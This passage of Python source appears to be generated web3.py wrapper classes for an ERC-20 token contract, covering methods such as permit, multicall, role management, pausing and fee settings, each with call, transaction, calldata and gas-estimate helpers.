        req, signature = self.validate_and_normalize_inputs(req, signature)
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method(req, signature).call(params)

    def send_transaction(
        self,
        req: ITokenERC20MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Broadcast the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        req, signature = self.validate_and_normalize_inputs(req, signature)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(req, signature).transact(params)

    def build_transaction(
        self,
        req: ITokenERC20MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        req, signature = self.validate_and_normalize_inputs(req, signature)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(req, signature).buildTransaction(params)

    def estimate_gas(
        self,
        req: ITokenERC20MintRequest,
        signature: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        req, signature = self.validate_and_normalize_inputs(req, signature)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(req, signature).estimateGas(params)
class MulticallMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the multicall method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, data: List[Union[bytes, str]]):
        """Validate the inputs to the multicall method."""
        self.validator.assert_valid(
            method_name="multicall",
            parameter_name="data",
            argument_value=data,
        )
        return data

    def call(
        self,
        data: List[Union[bytes, str]],
        tx_params: Optional[TxParams] = None,
    ) -> List[Union[bytes, str]]:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (data) = self.validate_and_normalize_inputs(data)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(data).call(tx_params.as_dict())
        # BUG FIX: the generated code did
        #   [Union[bytes, str](element) for element in returned]
        # but a subscripted typing.Union is not callable and raises
        # TypeError at runtime. The elements are already decoded bytes
        # values, so return them in a fresh list unchanged.
        return list(returned)

    def send_transaction(
        self,
        data: List[Union[bytes, str]],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (data) = self.validate_and_normalize_inputs(data)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(data).transact(tx_params.as_dict())

    def build_transaction(
        self,
        data: List[Union[bytes, str]],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (data) = self.validate_and_normalize_inputs(data)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(data).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        data: List[Union[bytes, str]],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (data) = self.validate_and_normalize_inputs(data)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(data).estimateGas(tx_params.as_dict())
class NameMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the name method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Read the token name via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class NoncesMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the nonces method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, owner: str):
        """Validate ``owner`` and return its checksummed form."""
        self.validator.assert_valid(
            method_name="nonces",
            parameter_name="owner",
            argument_value=owner,
        )
        return self.validate_and_checksum_address(owner)

    def call(self, owner: str, tx_params: Optional[TxParams] = None) -> int:
        """Read the owner's nonce via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        owner = self.validate_and_normalize_inputs(owner)
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method(owner).call(params))

    def send_transaction(
        self, owner: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        owner = self.validate_and_normalize_inputs(owner)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(owner).transact(params)

    def build_transaction(
        self, owner: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        owner = self.validate_and_normalize_inputs(owner)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(owner).buildTransaction(params)

    def estimate_gas(
        self, owner: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        owner = self.validate_and_normalize_inputs(owner)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(owner).estimateGas(params)
class NumCheckpointsMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the numCheckpoints method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        validator: Validator = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, account: str):
        """Validate ``account`` and return its checksummed form."""
        self.validator.assert_valid(
            method_name="numCheckpoints",
            parameter_name="account",
            argument_value=account,
        )
        return self.validate_and_checksum_address(account)

    def call(self, account: str, tx_params: Optional[TxParams] = None) -> int:
        """Read the checkpoint count via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return int(self._underlying_method(account).call(params))

    def send_transaction(
        self, account: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account).transact(params)

    def build_transaction(
        self, account: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account).buildTransaction(params)

    def estimate_gas(
        self, account: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        account = self.validate_and_normalize_inputs(account)
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method(account).estimateGas(params)
class PauseMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the pause method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> None:
        """Simulate pause via eth_call (no state change is persisted).

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        self._underlying_method().call(params)

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Broadcast the method as a transaction via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class PausedMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the paused method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return bool(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class PermitMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the permit method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        # PEP 484: a default of None requires an Optional annotation.
        validator: Optional[Validator] = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self,
        owner: str,
        spender: str,
        value: int,
        deadline: int,
        v: int,
        r: Union[bytes, str],
        s: Union[bytes, str],
    ):
        """Validate the inputs to the permit method.

        Addresses are checksummed and numeric inputs are coerced to int
        before being handed to the underlying contract function.
        """
        self.validator.assert_valid(
            method_name="permit",
            parameter_name="owner",
            argument_value=owner,
        )
        owner = self.validate_and_checksum_address(owner)
        self.validator.assert_valid(
            method_name="permit",
            parameter_name="spender",
            argument_value=spender,
        )
        spender = self.validate_and_checksum_address(spender)
        self.validator.assert_valid(
            method_name="permit",
            parameter_name="value",
            argument_value=value,
        )
        # safeguard against fractional inputs
        value = int(value)
        self.validator.assert_valid(
            method_name="permit",
            parameter_name="deadline",
            argument_value=deadline,
        )
        # safeguard against fractional inputs
        deadline = int(deadline)
        self.validator.assert_valid(
            method_name="permit",
            parameter_name="v",
            argument_value=v,
        )
        self.validator.assert_valid(
            method_name="permit",
            parameter_name="r",
            argument_value=r,
        )
        self.validator.assert_valid(
            method_name="permit",
            parameter_name="s",
            argument_value=s,
        )
        return (owner, spender, value, deadline, v, r, s)

    def call(
        self,
        owner: str,
        spender: str,
        value: int,
        deadline: int,
        v: int,
        r: Union[bytes, str],
        s: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (owner, spender, value, deadline, v, r, s) = (
            self.validate_and_normalize_inputs(
                owner, spender, value, deadline, v, r, s
            )
        )
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(owner, spender, value, deadline, v, r, s).call(
            tx_params.as_dict()
        )

    def send_transaction(
        self,
        owner: str,
        spender: str,
        value: int,
        deadline: int,
        v: int,
        r: Union[bytes, str],
        s: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (owner, spender, value, deadline, v, r, s) = (
            self.validate_and_normalize_inputs(
                owner, spender, value, deadline, v, r, s
            )
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            owner, spender, value, deadline, v, r, s
        ).transact(tx_params.as_dict())

    def build_transaction(
        self,
        owner: str,
        spender: str,
        value: int,
        deadline: int,
        v: int,
        r: Union[bytes, str],
        s: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (owner, spender, value, deadline, v, r, s) = (
            self.validate_and_normalize_inputs(
                owner, spender, value, deadline, v, r, s
            )
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            owner, spender, value, deadline, v, r, s
        ).buildTransaction(tx_params.as_dict())

    def estimate_gas(
        self,
        owner: str,
        spender: str,
        value: int,
        deadline: int,
        v: int,
        r: Union[bytes, str],
        s: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (owner, spender, value, deadline, v, r, s) = (
            self.validate_and_normalize_inputs(
                owner, spender, value, deadline, v, r, s
            )
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            owner, spender, value, deadline, v, r, s
        ).estimateGas(tx_params.as_dict())
class PrimarySaleRecipientMethod(
    ContractMethod
):  # pylint: disable=invalid-name
    """Various interfaces to the primarySaleRecipient method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
class RenounceRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the renounceRole method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        # PEP 484: a default of None requires an Optional annotation.
        validator: Optional[Validator] = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, role: Union[bytes, str], account: str
    ):
        """Validate the inputs to the renounceRole method."""
        self.validator.assert_valid(
            method_name="renounceRole",
            parameter_name="role",
            argument_value=role,
        )
        self.validator.assert_valid(
            method_name="renounceRole",
            parameter_name="account",
            argument_value=account,
        )
        # Normalize to a checksummed address before calling the contract.
        account = self.validate_and_checksum_address(account)
        return (role, account)

    def call(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(role, account).call(tx_params.as_dict())

    def send_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).estimateGas(
            tx_params.as_dict()
        )
class RevokeRoleMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the revokeRole method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        # PEP 484: a default of None requires an Optional annotation.
        validator: Optional[Validator] = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, role: Union[bytes, str], account: str
    ):
        """Validate the inputs to the revokeRole method."""
        self.validator.assert_valid(
            method_name="revokeRole",
            parameter_name="role",
            argument_value=role,
        )
        self.validator.assert_valid(
            method_name="revokeRole",
            parameter_name="account",
            argument_value=account,
        )
        # Normalize to a checksummed address before calling the contract.
        account = self.validate_and_checksum_address(account)
        return (role, account)

    def call(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(role, account).call(tx_params.as_dict())

    def send_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        role: Union[bytes, str],
        account: str,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (role, account) = self.validate_and_normalize_inputs(role, account)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(role, account).estimateGas(
            tx_params.as_dict()
        )
class SetContractUriMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the setContractURI method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        # PEP 484: a default of None requires an Optional annotation.
        validator: Optional[Validator] = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, uri: str):
        """Validate the inputs to the setContractURI method."""
        self.validator.assert_valid(
            method_name="setContractURI",
            parameter_name="_uri",
            argument_value=uri,
        )
        return uri

    def call(self, uri: str, tx_params: Optional[TxParams] = None) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        # Note: parens around a single target are grouping, not unpacking.
        uri = self.validate_and_normalize_inputs(uri)
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(uri).call(tx_params.as_dict())

    def send_transaction(
        self, uri: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        uri = self.validate_and_normalize_inputs(uri)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(uri).transact(tx_params.as_dict())

    def build_transaction(
        self, uri: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        uri = self.validate_and_normalize_inputs(uri)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(uri).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, uri: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        uri = self.validate_and_normalize_inputs(uri)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(uri).estimateGas(tx_params.as_dict())
class SetPlatformFeeInfoMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the setPlatformFeeInfo method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        # PEP 484: a default of None requires an Optional annotation.
        validator: Optional[Validator] = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(
        self, platform_fee_recipient: str, platform_fee_bps: int
    ):
        """Validate the inputs to the setPlatformFeeInfo method."""
        self.validator.assert_valid(
            method_name="setPlatformFeeInfo",
            parameter_name="_platformFeeRecipient",
            argument_value=platform_fee_recipient,
        )
        platform_fee_recipient = self.validate_and_checksum_address(
            platform_fee_recipient
        )
        self.validator.assert_valid(
            method_name="setPlatformFeeInfo",
            parameter_name="_platformFeeBps",
            argument_value=platform_fee_bps,
        )
        # safeguard against fractional inputs
        platform_fee_bps = int(platform_fee_bps)
        return (platform_fee_recipient, platform_fee_bps)

    def call(
        self,
        platform_fee_recipient: str,
        platform_fee_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        (platform_fee_recipient, platform_fee_bps) = (
            self.validate_and_normalize_inputs(
                platform_fee_recipient, platform_fee_bps
            )
        )
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(platform_fee_recipient, platform_fee_bps).call(
            tx_params.as_dict()
        )

    def send_transaction(
        self,
        platform_fee_recipient: str,
        platform_fee_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        (platform_fee_recipient, platform_fee_bps) = (
            self.validate_and_normalize_inputs(
                platform_fee_recipient, platform_fee_bps
            )
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            platform_fee_recipient, platform_fee_bps
        ).transact(tx_params.as_dict())

    def build_transaction(
        self,
        platform_fee_recipient: str,
        platform_fee_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        (platform_fee_recipient, platform_fee_bps) = (
            self.validate_and_normalize_inputs(
                platform_fee_recipient, platform_fee_bps
            )
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            platform_fee_recipient, platform_fee_bps
        ).buildTransaction(tx_params.as_dict())

    def estimate_gas(
        self,
        platform_fee_recipient: str,
        platform_fee_bps: int,
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        (platform_fee_recipient, platform_fee_bps) = (
            self.validate_and_normalize_inputs(
                platform_fee_recipient, platform_fee_bps
            )
        )
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(
            platform_fee_recipient, platform_fee_bps
        ).estimateGas(tx_params.as_dict())
class SetPrimarySaleRecipientMethod(
    ContractMethod
):  # pylint: disable=invalid-name
    """Various interfaces to the setPrimarySaleRecipient method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        # PEP 484: a default of None requires an Optional annotation.
        validator: Optional[Validator] = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, sale_recipient: str):
        """Validate the inputs to the setPrimarySaleRecipient method."""
        self.validator.assert_valid(
            method_name="setPrimarySaleRecipient",
            parameter_name="_saleRecipient",
            argument_value=sale_recipient,
        )
        # Normalize to a checksummed address before calling the contract.
        sale_recipient = self.validate_and_checksum_address(sale_recipient)
        return sale_recipient

    def call(
        self, sale_recipient: str, tx_params: Optional[TxParams] = None
    ) -> None:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        sale_recipient = self.validate_and_normalize_inputs(sale_recipient)
        tx_params = super().normalize_tx_params(tx_params)
        self._underlying_method(sale_recipient).call(tx_params.as_dict())

    def send_transaction(
        self, sale_recipient: str, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        sale_recipient = self.validate_and_normalize_inputs(sale_recipient)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(sale_recipient).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self, sale_recipient: str, tx_params: Optional[TxParams] = None
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        sale_recipient = self.validate_and_normalize_inputs(sale_recipient)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(sale_recipient).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self, sale_recipient: str, tx_params: Optional[TxParams] = None
    ) -> int:
        """Estimate gas consumption of method call."""
        sale_recipient = self.validate_and_normalize_inputs(sale_recipient)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(sale_recipient).estimateGas(
            tx_params.as_dict()
        )
class SupportsInterfaceMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the supportsInterface method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
        # PEP 484: a default of None requires an Optional annotation.
        validator: Optional[Validator] = None,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address, validator)
        self._underlying_method = contract_function

    def validate_and_normalize_inputs(self, interface_id: Union[bytes, str]):
        """Validate the inputs to the supportsInterface method."""
        self.validator.assert_valid(
            method_name="supportsInterface",
            parameter_name="interfaceId",
            argument_value=interface_id,
        )
        return interface_id

    def call(
        self,
        interface_id: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> bool:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        interface_id = self.validate_and_normalize_inputs(interface_id)
        tx_params = super().normalize_tx_params(tx_params)
        returned = self._underlying_method(interface_id).call(
            tx_params.as_dict()
        )
        return bool(returned)

    def send_transaction(
        self,
        interface_id: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        interface_id = self.validate_and_normalize_inputs(interface_id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(interface_id).transact(
            tx_params.as_dict()
        )

    def build_transaction(
        self,
        interface_id: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> dict:
        """Construct calldata to be used as input to the method."""
        interface_id = self.validate_and_normalize_inputs(interface_id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(interface_id).buildTransaction(
            tx_params.as_dict()
        )

    def estimate_gas(
        self,
        interface_id: Union[bytes, str],
        tx_params: Optional[TxParams] = None,
    ) -> int:
        """Estimate gas consumption of method call."""
        interface_id = self.validate_and_normalize_inputs(interface_id)
        tx_params = super().normalize_tx_params(tx_params)
        return self._underlying_method(interface_id).estimateGas(
            tx_params.as_dict()
        )
class SymbolMethod(ContractMethod):  # pylint: disable=invalid-name
    """Various interfaces to the symbol method."""

    def __init__(
        self,
        web3_or_provider: Union[Web3, BaseProvider],
        contract_address: str,
        contract_function: ContractFunction,
    ):
        """Persist instance data."""
        super().__init__(web3_or_provider, contract_address)
        self._underlying_method = contract_function

    def call(self, tx_params: Optional[TxParams] = None) -> str:
        """Execute underlying contract method via eth_call.

        :param tx_params: transaction parameters
        :returns: the return value of the underlying method.
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return str(self._underlying_method().call(params))

    def send_transaction(
        self, tx_params: Optional[TxParams] = None
    ) -> Union[HexBytes, bytes]:
        """Execute underlying contract method via eth_sendTransaction.

        :param tx_params: transaction parameters
        """
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().transact(params)

    def build_transaction(self, tx_params: Optional[TxParams] = None) -> dict:
        """Construct calldata to be used as input to the method."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().buildTransaction(params)

    def estimate_gas(self, tx_params: Optional[TxParams] = None) -> int:
        """Estimate gas consumption of method call."""
        params = super().normalize_tx_params(tx_params).as_dict()
        return self._underlying_method().estimateGas(params)
